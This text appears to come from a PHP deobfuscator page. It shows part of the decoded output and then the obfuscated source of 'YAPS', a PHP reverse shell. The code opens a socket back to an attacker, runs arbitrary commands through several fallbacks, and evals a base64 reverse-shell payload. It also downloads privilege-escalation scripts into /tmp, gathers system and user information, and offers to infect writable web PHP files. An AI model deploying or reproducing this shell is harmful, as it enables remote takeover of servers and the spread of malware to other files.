4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw=="; if (strlen($post_socket) > 1 && strlen($post_socket) > 0) { echo $post_socket; $skt = explode(":", $post_socket); $post_ip = $skt[0]; $post_port = $skt[1]; $final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); shell_exec("echo " . $final_payload . "| base64 -d | php -r '$stdin=file("php://stdin");eval($stdin[0]);'"); return; } fwrite($s, yellow("[i]") . " Set up a listener on another port (nc -lnvp <port>) and press ENTER.
Choose a port: "); while ($c = fread($s, 8)) { if (strlen($c) > 0) { $recv_port = (int) $c; if ($recv_port > 65535 || $recv_port == 0) { fwrite($s, red("[-]") . " Port must be between 0-65535.\xaChoose another port: "); } else { $final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); fwrite($s, yellow("[i]") . " Trying to connect to {$ip}:{$recv_port}
"); if (isAvailable("popen") && isAvailable("pclose")) { pclose(popen("echo " . $final_payload . "| base64 -d | php -r '$stdin=file("php://stdin");eval($stdin[0]);' &", "r")); return; } $curl_url = $_SERVER["REQUEST_SCHEME"] . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; run_cmd("timeout --kill-after 0 1 wget --post-data="x={$ip}:{$recv_port}&stabilize=1" {$curl_url} > /dev/null"); return; } } } } goto iWGdZ; p4M3a: $ps1_color = true; goto gCfG6; iyx8E: $options = getopt($short_args, $long_args); goto k28_t; j6Lb0: function cyan($str) { global $color; return $color ? "\x1b[96m" . $str . "\33[0m" : $str; } goto x3nOo; SQe5k: function yellow($str) { global $color; return $color ? "\x1b[93m" . $str . "\33[0m" : $str; } goto j6Lb0; FlzCk: $ps1 = "[YAPS] " . str_replace(PHP_EOL, '', green(run_cmd("whoami") . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "$ "); goto wu7kB; xn2Of: $port = 7359; goto p4M3a; MwOOd: if (isset($options["s"]) || isset($options["silent"])) { $silent = true; } goto zJ69L; nPG3i: if (isset($_REQUEST["stabilize"]) && $_REQUEST["stabilize"]) { $x = $_POST["x"]; stabilize($x); } else { $s = @fsockopen("tcp://{$ip}", $port); if (!$s) { die(red("[-] ") . "Couldn't connect to socket {$ip}:{$port}."); } connect(); } ?>Did this file decode correctly?
Original Code
<?php
goto H2UGy; mWaAD: ini_set("\x64\145\146\x61\165\154\164\137\163\157\143\x6b\145\164\x5f\164\151\x6d\145\157\x75\164", pow(99, 6)); goto OLG_c; gCfG6: $color = true; goto p0Ngs; p0Ngs: $use_password = false; goto kemz6; iBvWV: function duplicate() { global $s, $ip, $port, $_SERVER; if (!isset($_SERVER["\x52\105\x51\x55\x45\x53\124\x5f\x53\x43\x48\105\x4d\x45"]) || !isset($_SERVER["\x48\x54\124\120\137\110\x4f\x53\124"]) || !isset($_SERVER["\x52\105\x51\x55\x45\x53\124\x5f\x55\122\111"])) { fwrite($s, yellow("\x5b\x2d\135\x20") . "\103\x6f\165\x6c\x64\x6e\47\164\40\x66\x69\x6e\144\x20\x59\101\x50\x53\40\125\122\x4c\56\40\104\151\144\40\171\x6f\165\x20\x72\x75\x6e\x20\155\x65\x20\x76\151\141\40\x63\x6f\155\x6d\141\x6e\144\x20\154\151\x6e\x65\77\12\120\154\145\141\163\145\40\160\x72\157\166\x69\144\x65\x20\164\x68\145\40\143\157\x72\162\145\143\x74\x20\x59\101\x50\x53\x20\125\122\x4c\x20\50\145\x78\141\155\x70\x6c\x65\56\143\157\x6d\x2f\x66\151\154\145\163\57\x79\x61\x70\x73\56\x70\x68\x70\51\x3a\x20"); while ($yaps_url = fread($s, 256)) { if (get_request(preg_replace("\x2f\xa\x2f", '', $yaps_url . "\x3f\x76\x72\x66\x79")) !== "\x62\141\147\165\166\151\170") { return fwrite($s, red("\133\55\135\40") . "\x43\157\165\x6c\144\x6e\47\164\40\166\141\154\x69\144\x61\144\145\x20\x59\101\x50\x53\40\125\122\x4c\56\40\x49\x73\40\x74\x68\151\x73\40\164\150\145\x20\143\157\162\162\145\x63\x74\x20\x55\x52\x4c\x3f\xa"); } break; } $curl_url = $yaps_url; } else { $curl_url = $_SERVER["\122\105\121\125\105\x53\x54\x5f\x53\x43\x48\105\115\x45"] . "\x3a\x2f\x2f" . $_SERVER["\x48\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\105\121\x55\x45\123\124\x5f\125\122\x49"]; echo $curl_url; } fwrite($s, cyan("\133\x2a\135\x20") . "\103\x68\x6f\157\x73\x65\x20\141\40\160\157\162\164\40\x74\x6f\40\x6c\151\163\164\x65\156\x20\x28\144\145\x66\x61\x75\154\164\72\40{$port}\51\x3a\x20"); while ($new_port = fread($s, 32)) { $new_port = base64_encode($new_port) == "\x43\x67\75\x3d" ? $port : substr($new_port, 0, -1); $socket = array("\x78" => $ip . "\x3a" . $new_port); fwrite($s, "\103\157\156\x6e\x65\x63\164\151\x6e\147\40\164\x6f\x20" . $ip . "\72" . $new_port . "\xa"); $cmd = "\x77\x67\145\164\40\55\161\117\x2d\x20\55\x2d\160\157\163\164\55\x64\141\164\x61\75\x22" . http_build_query($socket) . "\42\40{$curl_url}\x20\76\40\57\144\145\166\x2f\x6e\165\154\154"; if (isAvailable("\x70\157\160\145\156") && isAvailable("\x70\x63\x6c\157\x73\x65")) { pclose(popen($cmd . "\x20\x26", "\162")); } else { run_cmd("\164\x69\x6d\145\x6f\165\164\40\55\x2d\153\x69\x6c\x6c\55\x61\x66\164\145\162\x20\60\x20\x31\40" . $cmd); } return; } } goto rHlHg; kXDc2: ignore_user_abort(1); goto y1ZOn; Sjo8m: function random_name($name = '') { $charset = implode('', array_merge(range("\x41", "\x5a"), range("\x61", "\x7a"), range(0, 9))); for ($i = 0; $i <= mt_rand(5, 6); $i++) { $name .= $charset[mt_rand(0, strlen($charset) - 1)]; } return $name; } goto CWqQu; gn8lq: $short_args = "\165\72\x3a\150\72\x3a\163\x3a\x3a"; goto EKCVq; hZBFi: $ip = "\x31\x32\x37\x2e\60\x2e\60\x2e\x31"; goto xn2Of; CWqQu: function download($url, $saveTo) { $randomName = random_name(); $content = get_request($url); if (isAvailable("\x66\151\x6c\145\137\160\x75\x74\x5f\143\x6f\156\164\145\156\x74\x73")) { if (file_put_contents($saveTo . "\x2f" . $randomName, $content)) { return $randomName; } } if (isAvailable("\x66\x6f\x70\x65\156") && isAvailable("\146\167\x72\151\x74\x65") && isAvailable("\146\x63\x6c\157\163\145")) { $fp = fopen($saveTo . "\x2f" . $randomName, "\167"); if (fwrite($fp, $content)) { fclose($fp); return $randomName; } } return false; } goto S9wqS; H2UGy: $version = "\61\56\63\56\x31"; goto KkL02; f9SPd: function cmd_not_found($cmd) { global $s, $commands; foreach ($commands as $valid_cmd) { similar_text($cmd, $valid_cmd, $percentage); if ($percentage > 70) { fwrite($s, yellow("\x5b\x21\135\x20") . "\103\x6f\x6d\155\x61\156\144\x20\47\41{$cmd}\47\x20\156\x6f\x74\x20\x66\157\x75\x6e\x64\56\x20\104\x69\144\x20\171\157\165\40\x6d\145\x61\x6e\40\x27\x21" . $valid_cmd . "\47\x3f\x2e\xa"); return; } } fwrite($s, yellow("\x5b\x21\x5d\x20") . "\x43\x6f\155\155\x61\156\144\x20\x27\x21" . substr($c, 1, -1) . "\x27\x20\156\157\x74\40\x66\x6f\x75\156\144\56\x20\125\x73\145\40\41\150\x65\x6c\160\56\12"); return; } goto VcfR6; jTCyq: $silent = false; goto LrEcv; WYwps: function passwd() { global $s, $use_password; if ($use_password) { if (!check_password()) { fwrite($s, red("\133\x2d\x5d\x20") . "\x20\127\x72\157\x6e\x67\x20\x70\141\163\163\x77\x6f\x72\x64\12"); return; } fwrite($s, green("\x5b\53\x5d\40\x50\x61\163\x73\167\x6f\x72\144\x20\151\163\x20\145\x6e\141\x62\x6c\x65\x64\x2e\40") . white("\103\150\157\157\x73\x65\x20\x61\x6e\x20\157\160\x74\151\157\156\72") . "\xa\133\61\x5d\40\103\150\141\156\147\x65\40\x70\x61\163\163\167\x6f\162\144\xa\x5b\x32\x5d\40\x44\x69\x73\x61\142\154\145\x20\160\x61\x73\163\167\x6f\x72\x64\12\133\x33\135\40\103\x61\156\143\x65\154\12\76\x20"); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "\61": fwrite($s, cyan("\133\x2a\x5d\40") . "\103\150\x6f\x6f\x73\145\40\164\150\145\40\x6e\x65\167\x20\160\x61\163\x73\x77\157\x72\144\x3a\40"); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "\62": toggle_password(); return; break; default: fwrite($s, cyan("\x5b\x2a\x5d\x20") . "\103\141\156\143\145\154\145\x64\56\12"); return; break; } } } else { fwrite($s, yellow("\133\x21\x5d\x20\x50\141\163\x73\x77\157\162\144\x20\x69\163\40\144\151\163\x61\142\x6c\x65\144\x2e\x20") . white("\x43\150\x6f\157\163\145\x20\x61\x6e\x20\157\x70\164\151\x6f\156\x3a") . "\12\133\x31\x5d\40\123\145\164\40\141\x20\160\141\x73\x73\167\157\x72\x64\xa\133\62\x5d\40\x45\156\x61\142\x6c\x65\x20\x70\141\x73\163\x77\x6f\x72\x64\12\x5b\63\x5d\x20\103\141\x6e\x63\145\154\12\76\x20"); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "\x31": fwrite($s, cyan("\x5b\x2a\x5d\40") . "\x43\150\x6f\x6f\x73\x65\40\x74\x68\x65\40\x6e\145\167\x20\160\141\x73\163\167\x6f\x72\x64\x3a\x20"); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "\x32": toggle_password(); return; break; default: fwrite($s, cyan("\133\x2a\135\40") . "\103\141\156\x63\145\154\x65\x64\56\xa"); return; break; } } } } goto iBvWV; SqGTY: if ($auto_verify_update) { verify_update(); } goto nPG3i; S9wqS: function enum() { global $s, $resources; $downloadLinpeas = download($resources["\154\x69\x6e\160\145\141\x73"], "\x2f\164\155\x70\x2f"); $downloadLinenum = download($resources["\x6c\x69\156\145\156\165\155"], "\x2f\x74\x6d\160"); if ($downloadLinpeas) { fwrite($s, green("\x5b\53\x5d") . "\x20\114\151\156\x70\145\141\x73\x20\163\x61\166\145\x64\40\164\x6f\40\x2f\164\155\160\57" . $downloadLinpeas . cyan("\12\133\151\135\40\103\x68\x61\x6e\147\151\156\147\40\160\x65\x72\155\x69\163\163\x69\x6f\156\x73\56\x2e\x2e\12")); if (chmod("\x2f\164\155\x70\x2f" . $downloadLinpeas, 777)) { fwrite($s, green("\133\53\135") . "\40\x50\x65\x72\155\151\163\x73\151\157\x6e\x73\x20\x63\x68\141\x6e\147\145\144\x21\x20\xa\133\x69\x5d\x20\131\x6f\165\40\x63\x61\x6e\x20\x72\165\x6e\x20\151\164\40\x77\x69\x74\x68\40" . yellow("\163\x68\x20\x2f\164\x6d\x70\x2f" . $downloadLinpeas . "\40\x7c\x20\x74\x65\145\40\57\164\155\160\x2f\154\x69\156\x70\x65\141\163\x2e\x6c\157\147\xa\12")); } else { fwrite($s, yellow("\133\x21\x5d") . "\x20\103\x6f\x75\154\x64\156\x27\x74\40\x63\150\x61\x6e\x67\x65\40\160\x65\x72\155\151\x73\163\x69\157\156\x73\x2e\56\56\40\xa\x5b\151\135\40\106\x69\x6c\x65\x20\x77\x61\163\40\163\141\166\x65\144\x20\151\x6e\40" . yellow("\x2f\164\155\x70\57" . $downloadLinpeas . "\12\xa")); } } if ($downloadLinenum) { fwrite($s, green("\133\x2b\x5d\x20\114\x69\x6e\145\x6e\x75\155\x20\163\141\166\145\144\x20\164\157\x20\57\164\155\x70\x2f" . $downloadLinenum) . cyan("\12\133\151\135\40\103\x68\x61\156\x67\151\x6e\147\x20\160\145\x72\x6d\x69\x73\163\x69\157\x6e\x73\x2e\56\56\xa")); if (chmod("\57\x74\x6d\160\x2f" . $downloadLinenum, 777)) { fwrite($s, green("\x5b\x2b\x5d") . "\x20\120\145\x72\x6d\x69\163\x73\x69\157\x6e\x73\40\143\x68\x61\x6e\x67\145\144\41\40\xa\133\x69\x5d\x20\x59\157\165\40\x63\x61\156\x20\162\x75\x6e\x20\151\x74\40\167\x69\x74\150\x20" . yellow("\163\150\40\57\164\155\x70\x2f" . $downloadLinenum . "\40\174\x20\164\x65\x65\x20\x2f\x74\155\x70\57\154\151\156\x65\156\165\155\x2e\154\x6f\147\xa")); } else { fwrite($s, yellow("\x5b\x21\135") . "\x20\103\x6f\x75\154\x64\156\47\164\40\x63\150\x61\156\147\x65\40\160\x65\x72\x6d\151\163\x73\151\x6f\156\x73\56\x2e\56\x20\xa\x5b\x69\x5d\x20\x46\151\x6c\145\40\x77\141\163\x20\x73\141\166\x65\144\40\x69\x6e\40" . yellow("\57\x74\155\160\57" . $downloadLinenum . "\12")); } } } goto r2M4e; uIseZ: function usage() { global $banner, $version; return $banner . "\xa" . yellow("\x55\163\x61\147\145\72") . white("\12\x54\x68\145\x72\145\x20\x61\162\145\x20\164\x68\x72\x65\145\40\167\x61\171\x73\x20\171\x6f\165\x20\143\x61\156\40\x73\164\141\162\164\x20\x74\x68\x65\40\x63\157\156\156\x65\143\x74\151\x6f\156\72\xa") . green("\x31\56\x20\126\151\x61\40\143\157\x6d\155\141\156\144\40\x6c\x69\x6e\145\x20\151\156\x20\164\x68\x65\x20\x63\x6f\155\160\162\x6f\x6d\x69\x73\145\144\x20\150\157\163\x74\x3b") . "\12\11\x45\56\147\x3a\40\x24\x20\x70\150\160\x20\x79\x61\160\163\56\160\x68\x70\40\x5b\157\x70\x74\x69\x6f\x6e\163\135\40\133\151\160\x20\x70\157\x72\164\x7c\x69\x70\x3a\x70\157\x72\x74\x5d\xa" . green("\x32\x2e\x20\x4d\141\x6b\x69\156\147\40\x61\x20\x50\117\x53\x54\40\x72\x65\x71\165\x65\x73\x74\40\164\157\40\x74\x68\145\x20\146\151\x6c\145\x20\x77\x69\164\x68\40\x74\x68\145\x20\x70\141\x72\141\155\x65\x74\145\162\40\x22\x78\42\73") . "\12\11\105\56\x67\72\40\44\x20\143\x75\x72\154\x20\x2d\x58\40\x50\117\x53\x54\40\55\x64\x20\42\x78\x3d\x31\x39\62\x2e\61\x36\70\x2e\67\x33\56\x35\71\x3a\x37\x33\x35\x39\42\x20\x68\141\143\x6b\145\x64\x2e\143\157\x6d\57\x75\x70\x6c\157\x61\144\163\57\x79\141\160\163\x2e\x70\x68\x70\xa" . green("\x33\56\x20\115\x61\153\x69\156\147\x20\141\x20\x47\x45\x54\x20\x72\x65\x71\165\145\x73\x74\40\167\151\164\x68\x6f\165\x74\x20\x70\141\162\x61\x6d\145\x74\145\162\163\40\50\167\x69\x6c\x6c\x20\143\x6f\156\x6e\x65\x63\164\x20\164\157\40\164\x68\x65\40\150\x61\x72\144\143\157\x64\x65\144\40\x73\x6f\143\x6b\145\x74\x29\x3b") . "\xa\11\x45\56\147\x3a\x20\44\40\x63\165\x72\154\x20\150\141\x63\x6b\x65\x64\56\x63\157\155\x2f\x75\x70\x6c\157\141\144\x73\57\x79\141\x70\163\56\x70\150\x70\xa" . yellow("\x4f\x70\x74\151\157\x6e\163\x3a") . white("\12\55\150\54\40\x2d\55\x68\145\154\x70\x3a\x20\40\40\40\40\x53\150\157\167\x20\164\150\151\163\40\x68\x65\x6c\160\12\x2d\163\54\40\55\55\x73\x69\154\x65\x6e\164\x3a\40\40\x20\123\x69\x6c\145\x6e\x74\40\x6d\x6f\144\145\40\x28\144\157\145\163\40\x6e\x6f\164\40\x64\151\x73\160\x6c\x61\171\x20\x62\141\156\156\x65\x72\51\12\55\x75\54\x20\55\55\x75\160\x64\141\164\145\x3a\x20\x20\40\x43\x68\x65\143\x6b\40\151\146\40\x59\x41\120\123\x20\151\x73\x20\165\x70\x20\164\157\40\144\141\164\x65\12") . yellow("\105\x78\141\x6d\160\154\145\163\x20\50\x73\x75\160\160\x6f\x73\x65\40\x79\x6f\165\162\40\x49\x50\x20\151\x73\x20\x31\71\62\x2e\x31\x36\x38\56\67\63\56\x35\71\51\72") . "\12\x69\x6e\146\145\143\x74\145\144\100\x68\x6f\x73\164\72\176\x24\x20\x70\x68\x70\x20\171\141\x70\163\56\x70\150\160\40\55\163\x20\61\x39\62\56\61\66\x38\56\67\63\56\x35\71\x20\x34\64\x34\64\12\151\156\146\x65\x63\x74\145\144\100\x68\157\163\x74\72\176\44\40\160\150\160\40\x79\141\x70\163\56\160\x68\160\40\x31\71\x32\x2e\x31\66\x38\56\x37\63\x2e\65\x39\x3a\x38\x30\x38\60\xa\x79\157\165\x72\100\x6d\x61\x63\x68\151\156\x65\x3a\176\x24\40\x63\x75\162\x6c\x20\55\130\x20\120\x4f\123\124\40\55\144\x20\42\x78\x3d\x31\71\x32\56\61\x36\x38\x2e\67\x33\x2e\x35\71\42\x20\150\141\143\x6b\x65\144\x2e\x63\x6f\x6d\57\165\160\154\x6f\x61\144\x73\57\171\141\x70\163\x2e\160\x68\x70\xa"; } goto TWD7O; lGppC: function select_files() { global $s; $webdir = array("\x2f\x76\141\x72\57\x77\x77\x77\57", "\x2f\163\x72\166\x2f", "\x2f\165\163\162\57\154\x6f\143\x61\x6c\x2f\x61\160\x61\143\150\x65\x32\57", "\57\166\x61\162\57\141\160\x61\143\x68\x65\x32\57", "\x2f\x76\x61\x72\x2f\x77\x77\x77\57\156\x67\151\156\x78\55\144\x65\146\141\165\154\x74\57"); $webfiles_arr = array(); foreach ($webdir as $dir) { try { $list = getFiles($dir); $webfiles_arr = array_merge($webfiles_arr, $list); } catch (Exception $e) { } } if (count($webfiles_arr) > 0) { fwrite($s, cyan("\x5b\52\x5d\40") . white("\106\157\165\x6e\144\40" . count($webfiles_arr) . "\40\167\x72\x69\x74\x61\142\154\x65\x20\120\x48\x50\x20\146\151\154\x65\x73\x3a\12")); } for ($i = 0; $i < count($webfiles_arr); $i++) { fwrite($s, red("\x5b{$i}\135\x20") . $webfiles_arr[$i] . PHP_EOL); } fwrite($s, cyan("\12\x5b\52\x5d\40") . white("\103\x68\157\x6f\163\145\40\164\x68\x65\x20\x66\151\x6c\145\163\40\x79\x6f\x75\x20\x77\141\x6e\164\40\164\x6f\x20\x69\156\146\145\143\x74\56\xa\x20\40\x20\40\x53\145\x70\141\x72\141\x74\x65\40\x62\171\x20\143\x6f\155\x6d\141\x20\x28\145\56\x67\x3a\61\x2c\65\x2c\67\x2c\70\x29\40\x61\156\x64\57\157\x72\40\142\x79\40\162\141\x6e\147\145\40\x28\145\56\x67\x3a\61\x30\55\x31\66\x29\x2e\12\40\x20\40\x20\106\x69\154\145\x73\x3a\x20")); while ($data2 = fread($s, 1024)) { $files = str_replace("\40", '', substr($data2, 0, -1)); $files = explode("\x2c", $files); if (count($files) == 1 && $files[0] == '') { return; } $toInfect = array(); foreach ($files as $file) { if (preg_match("\x2f\x5e\133\x30\x2d\x39\135\x2b\x24\57", $file)) { array_push($toInfect, $file); } if (preg_match("\57\x5e\133\x30\x2d\x39\135\53\x5c\55\x5b\x30\x2d\x39\x5d\53\x24\57", $file)) { $range = explode("\x2d", $file); if ((int) $range[0] < (int) $range[1]) { for ($i = (int) $range[0]; (int) $i <= $range[1]; $i++) { array_push($toInfect, $i); } } } } sort($toInfect, SORT_NUMERIC); choose_payload($webfiles_arr, array_unique($toInfect)); return; } } goto V18g8; LrEcv: if (isset($_GET["\x76\x72\x66\x79"])) { die("\x62\141\x67\165\x76\x69\170"); } goto mBQZf; gxovs: function getPHP() { global $s; $php = ''; fwrite($s, cyan("\x5b\x2a\135") . "\40\127\162\151\x74\x65\40\171\157\165\x72\40\x50\x48\120\40\143\157\x64\145\x20\x28\52\x77\x69\164\150\x6f\165\164\52\x20\x50\x48\x50\x20\x74\x61\147\163\x29\56\40\124\157\40\163\x65\156\144\x20\x61\156\144\x20\162\x75\x6e\x20\151\x74\x2c\x20\x75\163\145\40" . green("\x21\x70\x68\160") . "\x2e\x20" . yellow("\12\133\151\135\x20\x4e\157\164\145\40\164\150\141\164\40\164\x68\151\163\40\x69\x73\40\x4e\x4f\124\40\141\156\x20\151\x6e\x74\145\162\141\143\x74\x69\166\x65\x20\120\x48\x50\x20\x73\x68\x65\154\154\x2e\x20\115\x61\x78\x20\x69\156\160\165\x74\x3a\x20\64\x30\x39\66\x20\x62\x79\x74\x65\x73\56") . white("\xa\160\150\x70\x3e\40")); while ($c = fread($s, 4096)) { if (substr($c, 0, -1) == "\41\x70\150\x70") { return $php; } if (substr($c, 0, -1) == "\41\143\x61\156\x63\145\x6c") { return 0; } fwrite($s, white("\x70\150\160\x3e\x20")); $php .= $c; } return $php; } goto o75dl; TwUwH: if (isset($_POST["\170"]) && strpos($_POST["\170"], "\x3a") !== false) { $skt = explode("\x3a", $_POST["\x78"]); $ip = $skt[0]; $port = $skt[1]; } goto oxSzT; efuXl: function run_cmd($c) { $c = $c . "\x20\x32\76\46\x31\12"; if (isAvailable("\145\170\145\143")) { $stdout = array(); exec($c, $stdout); $stdout = join(chr(10), $stdout) . chr(10); } else { if (isAvailable("\163\x68\145\x6c\x6c\x5f\145\x78\x65\143")) { $stdout = shell_exec($c); } else { if (isAvailable("\x70\x6f\x70\x65\156")) { $fp = popen($c, "\x72"); $stdout = NULL; if (is_resource($fp)) { while (!feof($fp)) { $stdout .= fread($fp, 1024); } } @pclose($fp); } else { if (isAvailable("\160\x61\163\x73\164\x68\162\165")) { ob_start(); passthru($c); $stdout = ob_get_contents(); ob_end_clean(); } else { if (isAvailable("\x70\x72\157\x63\137\157\160\145\x6e")) { $handle = proc_open($c, array(array("\x70\x69\x70\145", "\x72"), array("\160\x69\x70\145", "\x77"), array("\x70\151\x70\x65", "\x77")), $pipes); $stdout = NULL; while (!feof($pipes[1])) { $stdout .= fread($pipes[1], 1024); } @proc_close($handle); } else { if (isAvailable("\x73\171\163\x74\145\155")) { ob_start(); system($c); $stdout = ob_get_contents(); ob_end_clean(); } else { $stdout = 0; } } } } } } return $stdout; } goto FlzCk; CXh7h: $pass_hash = "\x66\60\x30\71\64\x35\70\66\60\x34\x32\64\146\x61\x36\61\64\70\145\63\x32\71\67\x37\62\x63\60\x38\x65\x37\x64\x30\65\144\67\146\x61\x62\x36\x66\66\71\141\64\x37\x32\62\x62\x34\143\x36\66\x63\61\66\64\141\x63\144\142\x30\x31\70\x65\x63\143\x30\143\142\143\x36\x32\x30\66\x30\143\143\66\x37\x65\67\141\145\71\x36\x32\x63\66\65\x61\x62\x35\71\66\x37\66\62\60\66\62\x32\143\143\61\62\x32\x30\66\x36\x32\67\x32\x32\x39\x62\x39\x34\61\60\x36\x62\x36\66\144\142\66\142\70"; goto JzPAK; ZqmNp: function check_password() { global $s, $pass_hash, $salt; fwrite($s, yellow("\x5b\151\x5d\40") . "\124\150\x69\x73\40\163\150\x65\x6c\x6c\40\x69\x73\40\x70\x72\x6f\x74\x65\143\x74\x65\x64\x2e\x20\12\x45\156\164\x65\x72\x20\164\150\145\40\160\x61\x73\x73\167\157\x72\144\x3a\40"); while ($data = fread($s, 1024)) { $entered_pass = substr($data, 0, -1); return hash("\x73\150\141\65\61\62", $salt . hash("\x73\150\141\65\x31\x32", $entered_pass, false), false) == $pass_hash ? true : false; } } goto ssUNI; JzPAK: $auto_verify_update = false; goto jTCyq; y1ZOn: ini_set("\x6d\x61\x78\137\145\x78\145\143\x75\164\x69\157\156\x5f\x74\151\x6d\145", 0); goto mWaAD; OLG_c: $resources = array("\154\x69\x6e\160\145\x61\x73" => "\150\164\164\x70\163\x3a\57\57\x72\141\x77\56\147\151\x74\x68\165\x62\165\x73\x65\x72\143\157\x6e\164\x65\156\164\56\143\x6f\155\x2f\143\x61\162\154\x6f\x73\160\x6f\154\157\x70\57\x70\x72\151\166\151\x6c\x65\147\145\x2d\145\163\x63\141\x6c\141\x74\x69\157\x6e\x2d\141\x77\145\x73\x6f\155\x65\x2d\x73\143\x72\x69\x70\164\163\55\163\x75\151\x74\145\57\x6d\x61\163\164\145\162\x2f\x6c\151\156\x50\105\101\123\57\x6c\151\x6e\x70\145\x61\163\x2e\x73\x68", "\x6c\x69\x6e\145\x6e\x75\155" => "\150\164\x74\160\163\72\x2f\x2f\162\141\x77\x2e\x67\x69\164\150\x75\142\165\163\145\x72\x63\157\156\164\x65\156\164\x2e\143\x6f\x6d\57\162\x65\142\x6f\x6f\164\x75\163\145\x72\x2f\114\x69\x6e\x45\156\x75\x6d\x2f\155\x61\x73\x74\145\162\57\114\x69\x6e\x45\x6e\165\x6d\56\x73\150", "\163\165\x67\147\145\x73\164\x65\162" => "\150\x74\164\x70\163\72\x2f\x2f\x72\x61\167\56\147\x69\x74\x68\165\142\165\163\x65\162\x63\157\x6e\x74\x65\156\x74\x2e\143\x6f\155\57\x6d\172\x65\164\x2d\x2f\x6c\151\156\x75\x78\x2d\x65\170\x70\154\x6f\151\x74\x2d\x73\165\147\147\x65\163\x74\145\x72\x2f\x6d\x61\163\164\145\x72\x2f\x6c\151\156\165\x78\x2d\145\170\160\x6c\x6f\x69\x74\x2d\x73\165\147\147\x65\x73\x74\145\x72\x2e\163\x68", "\166\145\162\x69\146\x79\125\160\x64\141\x74\145\125\122\x4c" => "\150\164\164\x70\163\72\57\57\x72\141\x77\x2e\x67\x69\164\150\165\142\x75\163\x65\162\x63\157\x6e\x74\x65\x6e\164\x2e\x63\157\155\57\x4e\151\143\x6b\147\x75\151\164\x61\162\x2f\131\x41\120\x53\x2f\x6d\141\151\x6e\57\x76\x65\x72\x73\151\157\x6e", "\165\x70\x64\141\x74\x65\x55\x52\x4c" => "\150\164\x74\160\163\x3a\57\57\162\x61\167\56\147\151\164\x68\x75\142\165\x73\145\162\x63\x6f\x6e\x74\145\x6e\164\x2e\143\157\155\57\116\x69\143\153\x67\165\151\x74\x61\162\57\131\x41\x50\x53\x2f\155\141\151\156\x2f\171\x61\x70\x73\56\160\150\x70"); goto hZBFi; wu7kB: function sysinfo() { global $s; fwrite($s, green("\xa\75\75\75\75\75\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\40\111\156\x69\164\151\141\x6c\x20\x69\156\x66\x6f\x20\x3d\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\75\x3d\75\75\75\75\x3d\x3d\12\xa")); $info = cyan("\133\x69\x5d\x20\117\123\40\x69\156\146\x6f\72\xa") . run_cmd("\x6c\x73\142\x5f\x72\145\154\x65\141\x73\x65\40\x2d\141\40\x7c\x20\x67\162\x65\x70\x20\x2d\166\x20\x27\116\157\x20\114\123\x42\x27") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\110\157\x73\x74\156\x61\x6d\145\72\x20") . run_cmd("\x68\x6f\x73\164\x6e\x61\x6d\x65"); $info .= cyan("\133\x69\135\x20\x4b\x65\162\156\145\x6c\x3a\x20") . run_cmd("\x75\156\x61\155\145\x20\x2d\x61"); $info .= cyan("\x5b\x69\x5d\40\x43\x50\x55\72\x20\xa") . run_cmd("\143\141\164\x20\x2f\160\x72\157\x63\57\x63\160\x75\151\x6e\x66\157\x20\x7c\40\x67\162\145\x70\x20\x2d\151\40\47\155\x6f\x64\x65\154\x20\156\141\155\145\47\40\174\x20\x63\165\x74\40\55\144\x27\72\x27\40\x2d\146\x20\x32\40\x7c\40\163\145\144\40\x27\x73\x2f\136\x20\x2a\57\57\x67\47"); $info .= cyan("\133\151\135\x20\122\x41\x4d\x3a\40\xa") . run_cmd("\x63\x61\164\40\x2f\160\162\x6f\x63\x2f\x6d\145\155\x69\x6e\146\x6f\x20\x7c\x20\x65\147\x72\x65\160\40\55\x69\x20\x27\50\155\x65\155\164\x6f\x74\141\154\174\155\145\155\146\162\145\x65\51\x27"); $info .= cyan("\133\x69\135\40\123\x75\144\157\40\x76\145\162\x73\x69\x6f\156\72\40") . run_cmd("\163\165\x64\x6f\40\55\55\x76\x65\x72\163\151\x6f\x6e\40\174\x20\147\x72\x65\x70\40\47\123\x75\x64\157\x20\166\145\162\163\151\157\156\47\x20\x7c\40\143\x75\x74\40\55\x64\47\x20\x27\x20\55\x66\x20\x33"); $info .= cyan("\x5b\151\x5d\40\x55\163\145\x72\57\147\x72\157\165\160\163\x3a\40") . run_cmd("\x69\144") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\101\x63\x74\x69\x76\x65\40\x54\x54\131\x3a\x20\xa") . run_cmd("\167") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\x3d\x3d\75\75\75\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\x3d\75\75\x3d\x20\125\163\145\162\163\40\151\156\x66\x6f\x20\x3d\75\75\75\75\75\75\75\75\x3d\x3d\75\x3d\75\75\x3d\75\75\75\x3d\x3d\x3d\12\xa")); $info = cyan("\x5b\151\135\40\103\x75\162\162\x65\156\x74\x20\x75\163\145\162\x3a\40") . run_cmd("\167\x68\x6f\x61\x6d\151"); $info .= cyan("\x5b\x69\x5d\40\125\163\x65\162\x73\40\x69\x6e\x20\x2f\150\x6f\155\145\x3a\40\xa") . run_cmd("\x6c\x73\40\x2f\150\x6f\x6d\145") . PHP_EOL; $info .= cyan("\133\x69\135\x20\103\x72\157\x6e\164\x61\142\40\x6f\146\40\x63\x75\x72\162\x65\x6e\164\x20\x75\x73\145\162\72\40\xa") . run_cmd("\143\162\x6f\156\x74\141\142\40\55\x6c\x20\x7c\x20\145\x67\x72\145\160\40\x2d\x76\40\47\136\43\x27") . PHP_EOL; $info .= 